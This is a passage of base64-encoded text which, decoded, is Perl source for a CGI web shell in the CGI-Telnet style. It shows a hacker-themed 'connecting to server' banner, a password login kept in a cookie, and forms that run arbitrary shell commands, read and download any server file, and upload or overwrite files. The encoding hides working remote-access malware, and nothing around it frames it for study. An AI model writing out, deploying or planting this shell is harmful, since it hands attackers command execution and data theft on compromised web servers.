VtZW50LmdldEVsZW1lbnRCeUlkKCciICsgdGhpcy5lbGVtZW50LmlkICsgIicpLnR5cGluZ1RleHQucnVuKCkiLCB0aGlzLmludGVydmFsKTsKICB9IGVsc2UgewoJdGhpcy5jdXJyZW50VGV4dCA9ICIiOwoJdGhpcy5jdXJyZW50Q2hhciA9IDA7CiAgICAgICAgdGhpcy5ydW5uaW5nID0gZmFsc2U7CiAgICAgICAgdGhpcy5maW5pc2hlZENhbGxiYWNrKCk7CiAgfQp9Cjwvc2NyaXB0Pgo8L3ByZT4KCjxmb250IHN0eWxlPSJmb250OiAxNXB0IFZlcmRhbmE7IGNvbG9yOiB5ZWxsb3c7Ij5Db3B5cmlnaHQgKEMpIDIwMDEgUm9oaXRhYiBCYXRyYSA8L2ZvbnQ+PGJyPjxicj4KPHRhYmxlIGFsaWduPSJjZW50ZXIiIGJvcmRlcj0iMSIgd2lkdGg9IjYwMCIgaGVpZ2g+Cjx0Ym9keT48dHI+Cjx0ZCB2YWxpZ249InRvcCIgYmFja2dyb3VuZD0iaHR0cDovL2RsLmRyb3Bib3guY29tL3UvMTA4NjAwNTEvaW1hZ2VzL21hdHJhbi5naWYiPjxwIGlkPSJoYWNrIiBzdHlsZT0ibWFyZ2luLWxlZnQ6IDNweDsiPgo8Zm9udCBjb2xvcj0iIzAwOTkwMCI+IFBsZWFzZSBXYWl0IC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+IDxicj4KCjxmb250IGNvbG9yPSIjMDA5OTAwIj4gVHJ5aW5nIGNvbm5lY3QgdG8gU2VydmVyIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+PGJyPgo8Zm9udCBjb2xvcj0iI0YwMDAwMCI+PGZvbnQgY29sb3I9IiNGRkYwMDAiPn5cJDwvZm9udD4gQ29ubmVjdGVkICEgPC9mb250Pjxicj4KPGZvbnQgY29sb3I9IiMwMDk5MDAiPjxmb250IGNvbG9yPSIjRkZGMDAwIj4kU2VydmVyTmFtZX48L2ZvbnQ+IENoZWNraW5nIFNlcnZlciAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuPC9mb250PiA8YnI+Cgo8Zm9udCBjb2xvcj0iIzAwOTkwMCI+PGZvbnQgY29sb3I9IiNGRkYwMDAiPiRTZXJ2ZXJOYW1lfjwvZm9udD4gVHJ5aW5nIGNvbm5lY3QgdG8gQ29tbWFuZCAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+PGJyPgoKPGZvbnQgY29sb3I9IiNGMDAwMDAiPjxmb250IGNvbG9yPSIjRkZGMDAwIj4kU2VydmVyTmFtZX48L2ZvbnQ+XCQgQ29ubmVjdGVkIENvbW1hbmQhIDwvZm9udD48YnI+Cjxmb250IGNvbG9yPSIjMDA5OTAwIj48Zm9udCBjb2xvcj0iI0ZGRjAwMCI+JFNlcnZlck5hbWV+PGZvbnQgY29sb3I9IiNGMDAwMDAiPlwkPC9mb250PjwvZm9udD4gT0shIFlvdSBjYW4ga2lsbCBpdCE8L2ZvbnQ+CjwvdHI+CjwvdGJvZHk+PC90YWJsZT4KPGJyPgoKPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPgpuZXcgVHlwaW5nVGV4dChkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiaGFjayIpLCAzMCwgZnVuY3Rpb24oaSl7IHZhciBhciA9IG5ldyBBcnJheSgiXyIsIiIpOyByZXR1cm4gIiAiICsgYXJbaS5sZW5ndGggJSBhci5sZW5ndGhdOyB9KTsKVHlwaW5nVGV4dC5ydW5BbGwoKTsKCjwvc2NyaXB0PgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIEFkZCBodG1sIHNwZWNpYWwgY2hhcnMKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgSHRtbFNwZWNpYWxDaGFycygkKXsKCW15ICR0ZXh0ID0gc2hpZnQ7CgkkdGV4dCA9fiBzLyYvJmFtcDsvZzsKCSR0ZXh0ID1+IHMvIi8mcXVvdDsvZzsKCSR0ZXh0ID1+IHMvJy8mIzAzOTsvZzsKCSR0ZXh0ID1+IHMvPC8mbHQ7L2c7CgkkdGV4dCA9fiBzLz4vJmd0Oy9nOwoJcmV0dXJuICR0ZXh0Owp9CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBBZGQgbGluayBmb3IgZGlyZWN0b3J5CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEFkZExpbmtEaXIoJCkKewoJbXkgJGFjPXNoaWZ0OwoJbXkgQGRpcj0oKTsKCWlmKCRXaW5OVCkKCXsKCQlAZGlyPXNwbGl0KC9cXC8sJEN1cnJlbnREaXIpOwoJfWVsc2UKCXsKCQlAZGlyPXNwbGl0KCIvIiwmdHJpbSgkQ3VycmVudERpcikpOwoJfQoJbXkgJHBhdGg9IiI7CglteSAkcmVzdWx0PSIiOwoJZm9yZWFjaCAoQGRpcikKCXsKCQkkcGF0aCAuPSAkXy4kUGF0aFNlcDsKCQkkcmVzdWx0Lj0iPGEgaHJlZj0nP2E9Ii4kYWMuIiZkPSIuJHBhdGguIic+Ii4kXy4kUGF0aFNlcC4iPC9hPiI7Cgl9CglyZXR1cm4gJHJlc3VsdDsKfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBtZXNzYWdlIHRoYXQgaW5mb3JtcyB0aGUgdXNlciBvZiBhIGZhaWxlZCBsb2dpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQp7CglwcmludCA8PEVORDsKPGJyPkxvZ2luIDogQWRtaW5pc3RyYXRvcjxicj4KClBhc3N3b3JkOjxicj4KTG9naW4gaW5jb3JyZWN0PGJyPjxicj4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSBmb3IgbG9nZ2luZyBpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luRm9ybQp7CglwcmludCA8PEVORDsKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+CkxvZ2luIDogQWRtaW5pc3RyYXRvcjxicj4KUGFzc3dvcmQ6PGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwIj4KPGlucHV0IGNsYXNzPSJzdWJtaXQiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KPC9mb3JtPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgZm9vdGVyIGZvciB0aGUgSFRNTCBQYWdlCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50UGFnZUZvb3Rlcgp7CglwcmludCAiPGJyPjxmb250IGNvbG9yPXJlZD5vLS0tWyAgPGZvbnQgY29sb3I9I2ZmOTkwMD5FZGl0IGJ5ICRFZGl0UGVyc2lvbiA8L2ZvbnQ+ICBdLS0tbzwvZm9udD48L2NvZGU+PC9jZW50ZXI+PC9ib2R5PjwvaHRtbD4iOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNhbiBiZSBhY2Nlc3NlcyB1c2luZyB0aGUKIyB2YXJpYWJsZSAkQ29va2llc3snJ30KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgR2V0Q29va2llcwp7CglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOwoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2llcykKCXsKCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7CgkJJENvb2tpZXN7JGlkfSA9ICR2YWw7Cgl9Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIHNjcmVlbiB3aGVuIHRoZSB1c2VyIGxvZ3Mgb3V0CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9nb3V0U2NyZWVuCnsKCXByaW50ICJDb25uZWN0aW9uIGNsb3NlZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj4iOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgTG9ncyBvdXQgdGhlIHVzZXIgYW5kIGFsbG93cyB0aGUgdXNlciB0byBsb2dpbiBhZ2FpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQZXJmb3JtTG9nb3V0CnsKCXByaW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD07XG4iOyAjIHJlbW92ZSBwYXNzd29yZCBjb29raWUKCSZQcmludFBhZ2VIZWFkZXIoInAiKTsKCSZQcmludExvZ291dFNjcmVlbjsKCgkmUHJpbnRMb2dpblNjcmVlbjsKCSZQcmludExvZ2luRm9ybTsKCSZQcmludFBhZ2VGb290ZXI7CglleGl0Owp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gbG9naW4gdGhlIHVzZXIuIElmIHRoZSBwYXNzd29yZCBtYXRjaGVzLCBpdAojIGRpc3BsYXlzIGEgcGFnZSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBydW4gY29tbWFuZHMuIElmIHRoZSBwYXNzd29yZCBkb2Vucyd0CiMgbWF0Y2ggb3IgaWYgbm8gcGFzc3dvcmQgaXMgZW50ZXJlZCwgaXQgZGlzcGxheXMgYSBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyCiMgdG8gbG9naW4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUGVyZm9ybUxvZ2luIAp7CglpZigkTG9naW5QYXNzd29yZCBlcSAkUGFzc3dvcmQpICMgcGFzc3dvcmQgbWF0Y2hlZAoJewoJCXByaW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD0kTG9naW5QYXNzd29yZDtcbiI7CgkJJlByaW50UGFnZUhlYWRlcjsKCQlwcmludCAmTGlzdERpcjsKCX0KCWVsc2UgIyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJwIik7CgkJJlByaW50TG9naW5TY3JlZW47CgkJaWYoJExvZ2luUGFzc3dvcmQgbmUgIiIpICMgc29tZSBwYXNzd29yZCB3YXMgZW50ZXJlZAoJCXsKCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOwoKCQl9CgkJJlByaW50TG9naW5Gb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7CgkJZXhpdDsKCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGNvbW1hbmRzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0KewoJbXkgJGRpcj0gIjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+Ii4mQWRkTGlua0RpcigiY29tbWFuZCIpLiI8L3NwYW4+IjsKCSRQcm9tcHQgPSAkV2luTlQgPyAiJGRpciA+ICIgOiAiPGZvbnQgY29sb3I9JyM2NmZmNjYnPlthZG1pblxAJFNlcnZlck5hbWUgJGRpcl1cJDwvZm9udD4gIjsKCXJldHVybiA8PEVORDsKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+Cgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+Cgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPgokUHJvbXB0CjxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSI1MCIgbmFtZT0iYyI+CjxpbnB1dCBjbGFzcz0ic3VibWl0InR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KPC9mb3JtPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGRvd25sb2FkIGZpbGVzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50RmlsZURvd25sb2FkRm9ybQp7CglteSAkZGlyID0gJkFkZExpbmtEaXIoImRvd25sb2FkIik7IAoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRkaXJdXCQgIjsKCXJldHVybiA8PEVORDsKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJkb3dubG9hZCI+CiRQcm9tcHQgZG93bmxvYWQ8YnI+PGJyPgpGaWxlbmFtZTogPGlucHV0IGNsYXNzPSJmaWxlIiB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4KRG93bmxvYWQ6IDxpbnB1dCBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+Cgo8L2Zvcm0+CkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gdXBsb2FkIGZpbGVzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50RmlsZVVwbG9hZEZvcm0KewoJbXkgJGRpcj0gJkFkZExpbmtEaXIoInVwbG9hZCIpOwoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRkaXJdXCQgIjsKCXJldHVybiA8PEVORDsKPGZvcm0gbmFtZT0iZiIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CiRQcm9tcHQgdXBsb2FkPGJyPjxicj4KRmlsZW5hbWU6IDxpbnB1dCBjbGFzcz0iZmlsZSIgdHlwZT0iZmlsZSIgbmFtZT0iZiIgc2l6ZT0iMzUiPjxicj48YnI+Ck9wdGlvbnM6ICZuYnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgaWQ9InVwIiB2YWx1ZT0ib3ZlcndyaXRlIj4KPGxhYmVsIGZvcj0idXAiPk92ZXJ3cml0ZSBpZiBpdCBFeGlzdHM8L2xhYmVsPjxicj48YnI+ClVwbG9hZDombmJzcDsmbmJzcDsmbmJzcDs8aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPgo8aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0idXBsb2FkIj4KCjwvZm9ybT4KCkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdGltZW91dCBmb3IgYSBjb21tYW5kIGV4cGlyZXMuIFdlIG5lZWQgdG8KIyB0ZXJtaW5hdGUgdGhlIHNjcmlwdCBpbW1lZGlhdGVseS4gVGhpcyBmdW5jdGlvbiBpcyB2YWxpZCBvbmx5IG9uIFVuaXguIEl0IGlzCiMgbmV2ZXIgY2FsbGVkIHdoZW4gdGhlIHNjcmlwdCBpcyBydW5uaW5nIG9uIE5ULgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBDb21tYW5kVGltZW91dAp7CglpZighJFdpbk5UKQoJewoJCWFsYXJtKDApOwoJCXJldHVybiA8PEVORDsKPC90ZXh0YXJlYT4KPGJyPjxmb250IGNvbG9yPXllbGxvdz4KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLjwvZm9udD4KPGJyPjxmb250IHNpemU9JzYnIGNvbG9yPXJlZD5LaWxsZWQgaXQhPC9mb250PgpFTkQKCX0KfQoKCgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBkaXNwbGF5cyB0aGUgcGFnZSB0aGF0IGNvbnRhaW5zIGEgbGluayB3aGljaCBhbGxvd3MgdGhlIHVzZXIKIyB0byBkb3dubG9hZCB0aGUgc3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gKIyBmZWF0dXJlIHRoYXQgc3RhcnRzIHRoZSBkb3dubG9hZCBhdXRvbWF0aWNhbGx5LgojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmllZCBmaWxlbmFtZSBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50RG93bmxvYWRMaW5rUGFnZQp7Cglsb2NhbCgkRmlsZVVybCkgPSBAXzsKCW15ICRyZXN1bHQ9IiI7CglpZigtZSAkRmlsZVVybCkgIyBpZiB0aGUgZmlsZSBleGlzdHMKCXsKCQkjIGVuY29kZSB0aGUgZmlsZSBsaW5rIHNvIHdlIGNhbiBzZW5kIGl0IHRvIHRoZSBicm93c2VyCgkJJEZpbGVVcmwgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJIKiIsJDEpL2VnOwoJCSREb3dubG9hZExpbmsgPSAiJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZj0kRmlsZVVybCZvPWdvIjsKCQkkSHRtbE1ldGFIZWFkZXIgPSAiPG1ldGEgSFRUUC1FUVVJVj1cIlJlZnJlc2hcIiBDT05URU5UPVwiMTsgVVJMPSREb3dubG9hZExpbmtcIj4iOwoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCQkkcmVzdWx0IC49IDw8RU5EOwpTZW5kaW5nIEZpbGUgJFRyYW5zZmVyRmlsZS4uLjxicj4KCklmIHRoZSBkb3dubG9hZCBkb2VzIG5vdCBzdGFydCBhdXRvbWF0aWNhbGx5LAo8YSBocmVmPSIkRG93bmxvYWRMaW5rIj5DbGljayBIZXJlPC9hPgpFTkQKCQkkcmVzdWx0IC49ICZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJfQoJZWxzZSAjIGZpbGUgZG9lc24ndCBleGlzdAoJewoJCSRyZXN1bHQgLj0gIkZhaWxlZCB0byBkb3dubG9hZCAkRmlsZVVybDogJCEiOwoJCSRyZXN1bHQgLj0gJlByaW50RmlsZURvd25sb2FkRm9ybTsKCX0KCXJldHVybiAkcmVzdWx0Owp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJvbSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlCiMgYnJvd3Nlciwgc28gdGhhdCBpdCBjYW4gYmUgZG93bmxvYWRlZCBieSB0aGUgdXNlci4KIyBBcmd1bWVudCAxOiBGdWxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgc2VudC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgU2VuZEZpbGVUb0Jyb3dzZXIKewoJbXkgJHJlc3VsdCA9ICIiOwoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOwoJaWYob3BlbihTRU5ERklMRSwgJFNlbmRGaWxlKSkgIyBmaWxlIG9wZW5lZCBmb3IgcmVhZGluZwoJewoJCWlmKCRXaW5OVCkKCQl7CgkJCWJpbm1vZGUoU0VOREZJTEUpOwoJCQliaW5tb2RlKFNURE9VVCk7CgkJfQoJCSRGaWxlU2l6ZSA9IChzdGF0KCRTZW5kRmlsZSkpWzddOwoJCSgkRmlsZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsKCQlwcmludCAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXVua25vd25cbiI7CgkJcHJpbnQgIkNvbnRlbnQtTGVuZ3RoOiAkRmlsZVNpemVcbiI7CgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSQxXG5cbiI7CgkJcHJpbnQgd2hpbGUoPFNFTkRGSUxFPik7CgkJY2xvc2UoU0VOREZJTEUpOwoJCWV4aXQoMSk7Cgl9CgllbHNlICMgZmFpbGVkIHRvIG9wZW4gZmlsZQoJewoJCSRyZXN1bHQgLj0gIkZhaWxlZCB0byBkb3dubG9hZCAkU2VuZEZpbGU6ICQhIjsKCQkkcmVzdWx0IC49JlByaW50RmlsZURvd25sb2FkRm9ybTsKCX0KCXJldHVybiAkcmVzdWx0Owp9CgoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgZG93bmxvYWRzIGEgZmlsZS4gSXQgZGlzcGxheXMgYSBtZXNzYWdlCiMgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluayB0aHJvdWdoIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLgojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsCiMgdGhlIGZpbGUgaXMgcmVhZCBhbmQgc2VudCB0byB0aGUgYnJvd3Nlci4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgQmVnaW5Eb3dubG9hZAp7CgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwKCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUKCXsKCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7Cgl9CgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQoJewoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsKCX0KCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQoJewoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7Cgl9CgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQoJewoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd